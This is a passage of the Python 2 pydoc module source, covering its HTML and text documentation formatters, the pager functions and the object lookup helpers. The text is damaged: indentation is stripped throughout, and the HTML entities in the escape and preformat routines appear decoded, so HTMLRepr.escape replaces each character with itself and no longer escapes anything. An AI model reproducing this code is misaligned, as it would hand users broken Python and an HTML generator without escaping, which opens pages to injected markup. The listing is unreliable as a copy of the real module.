not file.startswith(os.path.join(basedir, 'site-packages')))) and
object.__name__ not in ('xml.etree', 'test.pydoc_mod')):
if docloc.startswith(("http://", "https://")):
docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__.lower())
else:
docloc = os.path.join(docloc, object.__name__.lower() + ".html")
else:
docloc = None
return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
return replace(text, '&', '&', '<', '<', '>', '>')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<font color="#c040c0">\1</font>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return _encode('''
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
<meta charset="utf-8">
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents), 'ascii')
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom> <br>
<font color="%s" face="helvetica, arial"> <br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
''' % (bgcol, fgcol, title, fgcol, extras or ' ')
def section(self, title, fgcol, bgcol, contents, width=6,
prelude='', marginalia=None, gap=' '):
"""Format a section with a heading."""
if marginalia is None:
marginalia = '<tt>' + ' ' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom> <br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(expandtabs(text))
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
' ', ' ', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)//cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100//cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, data):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = data
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '"')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif selfdot:
# Create a link for methods like 'self.method(...)'
# and use <strong> for attributes like 'self.attr'
if text[end:end+1] == '(':
results.append('self.' + self.namelink(name, methods))
else:
results.append('self.<strong>%s</strong>' % name)
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return join(results, '')
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + join(parents, ', ') + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = split(name, '.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
(join(parts[:i+1], '.'), parts[i]))
linkedname = join(links + parts[-1:], '.')
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getabsfile(object)
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
filelink = '<a href="file:%s">%s</a>' % (url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = _binstr(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(_binstr(object.__date__)))
if info:
head = head + ' (%s)' % join(info, ', ')
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
def isnonbuiltinmodule(obj):
return inspect.ismodule(obj) and obj is not __builtin__
modules = inspect.getmembers(object, isnonbuiltinmodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda key_value, s=self: s.modulelink(key_value[1]))
result = result + self.bigsection(
'Modules', '#ffffff', '#aa55cc', contents)
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', join(contents, '<br>\n'))
if hasattr(object, '__author__'):
contents = self.markup(_binstr(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(_binstr(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value, name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = filter(lambda data: visiblename(data[0], obj=object),
classify_class_attrs(object))
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
pass
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
try:
attrs.sort(key=lambda t: t[0])
except TypeError:
attrs.sort(lambda t1, t2: cmp(t1[0], t2[0])) # 2.3 compat
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % join(parents, ', ')
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
doc = doc and '<tt>%s<br> </tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % self.classlink(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.im_func
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><tt>%s</tt></dd>\n' % doc)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir]):
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return join(map(lambda ch: ch + '\b' + ch, text), '')
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = split(text, '\n')
lines = map(lambda line, prefix=prefix: prefix + line, lines)
if lines: lines[-1] = rstrip(lines[-1])
return join(lines, '\n')
def section(self, title, contents):
"""Format a section with a given heading."""
return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = map(lambda c, m=modname: classname(c, m), bases)
result = result + '(%s)' % join(parents, ', ')
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
try:
all = object.__all__
except AttributeError:
all = None
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE DOCS', docloc)
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
modpkgs = []
modpkgs_names = set()
if hasattr(object, '__path__'):
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs_names.add(modname)
if ispkg:
modpkgs.append(modname + ' (package)')
else:
modpkgs.append(modname)
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', join(modpkgs, '\n'))
# Detect submodules as sometimes created by C extensions
submodules = []
for key, value in inspect.getmembers(object, inspect.ismodule):
if value.__name__.startswith(name + '.') and key not in modpkgs_names:
submodules.append(key)
if submodules:
submodules.sort()
result = result + self.section(
'SUBMODULES', join(submodules, '\n'))
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', join(contents, '\n'))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', join(contents, '\n'))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, maxlen=70))
result = result + self.section('DATA', join(contents, '\n'))
if hasattr(object, '__version__'):
version = _binstr(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', _binstr(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', _binstr(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', _binstr(object.__credits__))
return result
def docclass(self, object, name=None, mod=None, *ignored):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % join(parents, ', ')
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value,
name, mod, object))
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, maxlen=70, doc=doc) + '\n')
return attrs
attrs = filter(lambda data: visiblename(data[0], obj=object),
classify_class_attrs(object))
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % classname(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.im_func
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = self.bold(name) + ' lambda '
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docdescriptor(name, object, mod)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
pager = getpager()
pager(text)
def getpager():
"""Decide what method to use for paging through text."""
if type(sys.stdout) is not types.FileType:
return plainpager
if not hasattr(sys.stdin, "isatty"):
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
elif os.environ.get('TERM') in ('dumb', 'emacs'):
return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
if os.environ.get('TERM') in ('dumb', 'emacs'):
return plainpager
if sys.platform == 'win32' or sys.platform.startswith('os2'):
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(_encode(text))
pipe.close()
except IOError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
file = open(filename, 'w')
file.write(_encode(text))
file.close()
try:
os.system(cmd + ' "' + filename + '"')
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = plain(_encode(plain(text), getattr(sys.stdout, 'encoding', _encoding))).split('\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
try:
try:
h = int(os.environ.get('LINES', 0))
except ValueError:
h = 0
if h <= 1:
h = 25
r = inc = h - 1
sys.stdout.write(join(lines[:inc], '\n') + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ('q', 'Q'):
sys.stdout.write('\r \r')
break
elif c in ('\r', '\n'):
sys.stdout.write('\r \r' + lines[r] + '\n')
r = r + 1
continue
if c in ('b', 'B', '\x1b'):
r = r - inc - inc
if r < 0: r = 0
sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(_encode(plain(text), getattr(sys.stdout, 'encoding', _encoding)))
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isgetsetdescriptor(thing):
return 'getset descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.ismemberdescriptor(thing):
return 'member descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
if type(thing) is types.InstanceType:
return 'instance of ' + thing.__class__.__name__
return type(thing).__name__
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in split(path, '.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport(join(parts[:n+1], '.'), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
else:
object = __builtin__
for part in parts[n:]:
try:
object = getattr(object, part)
except AttributeError:
return None
return object
# --------------------------------------- interactive interpreter interface
text = TextDoc()
html = HTMLDoc()
class _OldStyleClass: pass
_OLD_INSTANCE_TYPE = type(_OldStyleClass())
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if object is None:
